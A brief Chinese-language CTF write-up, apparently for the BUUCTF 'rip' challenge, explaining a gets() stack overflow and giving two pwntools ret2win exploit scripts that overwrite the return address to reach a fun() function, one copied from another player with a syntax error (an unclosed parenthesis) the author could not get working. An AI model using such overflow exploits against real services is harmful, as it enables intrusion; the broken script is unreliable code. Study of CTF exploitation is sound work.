gets函数不限制输入的长度,存在溢出
查看栈空间,payload = 0xf + 8
发现fun()函数,
构造exp
from pwn import *
p = process('pwn1')
#p = remote('redirect.do-not-trust.hacking.run',10026)
payload = b'A'*0xF+ p64(0x401186)
p.sendline(payload)
p.interactive()
from pwn import *
io = remote('redirect.do-not-trust.hacking.run',10043)
context.log_level = 'debug'
payload = b"A"*(0xf + 8) +p64(0x401198)+ p64(0x401186
io.sendline(payload)
io.interactive()
这个是网上一个师傅的exp,我调试了好久就是不行,看了这个还是不太懂为啥要加p64(0x401198)
先继续往后做吧!
参考链接:
https://blog.csdn.net/weixin_46436680/article/details/105853304?utm_medium=distribute.pc_aggpage_search_result.none-task-blog-2aggregatepagefirst_rank_ecpm_v1~rank_v31_ecpm-2-105853304.pc_agg_new_rank&utm_term=BUUCTF%E4%B8%ADrip&spm=1000.2123.3001.4430
http://blog.eonew.cn/archives/958